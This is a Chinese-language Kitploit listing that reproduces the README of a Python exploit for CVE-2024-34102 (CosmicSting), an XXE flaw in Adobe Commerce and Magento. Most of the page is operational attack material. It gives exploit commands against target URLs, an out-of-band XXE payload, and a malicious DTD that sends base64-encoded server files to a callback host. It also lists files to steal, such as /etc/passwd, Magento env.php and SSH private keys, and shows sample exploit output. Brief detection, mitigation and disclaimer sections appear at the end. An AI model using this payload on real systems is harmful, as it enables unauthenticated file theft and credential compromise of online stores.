Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-34102 — CVE-2024-34102 的 python3 漏洞利用 | Kitploit
工具/GitHubGitHub/nmmorette/cve-2024-34102
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubnmmorette/cve-2024-34102

CVE-2024-34102

CVE-2024-34102 的 python3 漏洞利用

查看仓库
147个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-34102 - CosmicSting XXE 漏洞利用

Python Version CVE

针对 CVE-2024-34102 (CosmicSting) 的漏洞利用 - Adobe Commerce 和 Magento 中的 XML 外部实体 (XXE) 漏洞。

📋 关于漏洞

CVE-2024-34102 是一个严重的 XXE(XML 外部实体)漏洞,影响范围:

  • Adobe Commerce 2.4.7、2.4.6-p5、2.4.5-p7、2.4.4-p8 及更早版本
  • Magento Open Source(相同版本)

该漏洞允许未经身份验证的攻击者:

  • 📄 读取服务器上的任意文件
  • 🔐 窃取凭据和敏感配置
  • 💾 访问数据库信息
  • 🚨 执行任意代码(在某些场景下)

CVSS 评分: 9.8(严重)

🎯 致谢

此漏洞利用基于以下作者的原创工作:

  • @Chocapikk - 原始 CVE-2024-34102 漏洞利用

本版本的改进:

  • ✅ 自定义动态 DTD 服务器(避免依赖 fars.ee)
  • ✅ 支持自动解码的回调服务器
  • ✅ 必需的参数校验
  • ✅ 外部服务的重试逻辑
  • ✅ 更详细的错误信息
  • ✅ 回调支持 HTTPS
  • ✅ 完全兼容 Python 3.8+

🛠️ 环境要求

  • Python 3.8 或更高版本
  • 可访问的服务器用于托管 DTD 文件(VPS、Burp Collaborator 等)
  • 回调服务(Burp Collaborator、Oastify 或自己的服务器)

📦 安装

# 克隆仓库
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102

# 安装依赖
pip install -r requirements.txt

🚀 使用方法

方法 1:使用 fars.ee(自动)

python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com

方法 2:使用自己的 DTD 服务器

终端 1 - DTD 服务器:

sudo python3 server_dtd.py

终端 2 - 漏洞利用:

python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c your-callback.oastify.com \
  --dtd-server YOUR-IP:8000

方法 3:使用自己的回调服务器

终端 1 - DTD 服务器:

sudo python3 server_dtd.py

终端 2 - 回调服务器(自动解码):

sudo python3 callback_server.py

终端 3 - 漏洞利用:

python3 exploit.py \
  -u https://target.com \
  -f /etc/passwd \
  -c YOUR-CALLBACK-IP \
  --dtd-server YOUR-DTD-IP:8000

📝 参数

必需参数:

  • -u, --url - 目标 URL(基础域名)
  • -f, --file - 要读取的服务器文件(例如 /etc/passwd)
  • -c, --callback - 回调服务器(IP/域名)

可选参数:

  • --dtd-server - 自定义服务器,用于托管 DTD 文件
  • --https - 对回调使用 HTTPS(默认:HTTP)

🎬 示例

读取 /etc/passwd

python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /etc/passwd \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

读取 Magento 配置

python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /var/www/html/app/etc/env.php \
  -c abc123.oastify.com \
  --dtd-server 192.168.1.100:8000

读取 SSH 密钥

python3 exploit.py \
  -u https://vulnerable-site.com \
  -f /home/ubuntu/.ssh/id_rsa \
  -c abc123.burpcollaborator.net \
  --dtd-server 192.168.1.100:8000 \
  --https

🔍 工作原理

1. 带外 XXE

该漏洞利用使用带外(Out-of-Band) XXE 技术来窃取数据:

<!-- 发送到目标的载荷 -->
<!DOCTYPE r [
  <!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
  %sp;
  %param1;
]>
<r>&exfil;</r>

2. 外部 DTD

目标服务器下载恶意 DTD:

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">

3. 数据窃取

服务器处理 XML,读取文件,以 base64 编码并发送到回调:

GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...

4. 解码

echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d

📊 输出示例

[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http

DTD will be dynamically generated with:
[*]   Callback: http://abc123.oastify.com
[*]   File: /etc/passwd

DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...

=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>

To decode the exfiltrated data:
[*]   echo 'BASE64_STRING' | base64 -d

[!] Check your Burp Collaborator or Oastify dashboard now!

🛡️ 检测与缓解

对于防御者:

检测:

  • 监控对 /rest/V1/guest-carts/*/estimate-shipping-methods 端点的 HTTP 请求
  • 对包含外部实体(<!ENTITY)的 XML 载荷发出告警
  • 检测到可疑域名的出站连接

缓解措施:

  • 更新到已修复版本:
    • Adobe Commerce 2.4.7-p1, 2.4.6-p6, 2.4.5-p8, 2.4.4-p9
  • 在 XML 解析器中禁用外部实体处理
  • 部署带有反 XXE 规则的 WAF

对于渗透测试人员:

值得测试的文件:

/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ

⚖️ 法律免责声明

此漏洞利用仅用于教育和安全研究目的。

在未经明确授权的情况下使用此代码测试系统是违法的。

您应对自己的行为承担全部责任。仅在以下环境使用:
✅ 您自己的测试环境
✅ 已授权的漏洞赏金计划
✅ 签约的渗透测试项目

禁止在以下环境使用:
❌ 未经授权的系统
❌ 未经许可的生产环境
❌ 任何恶意活动

作者不对滥用此代码的行为负责。

📚 参考资料

  • Adobe 安全公告 APSB24-40
  • CVE-2024-34102 详细信息
  • OWASP XXE 防护指南
  • Chocapikk 的原始漏洞利用

⭐ 如果这个项目对你有用,请考虑给它一个 Star!

下载工具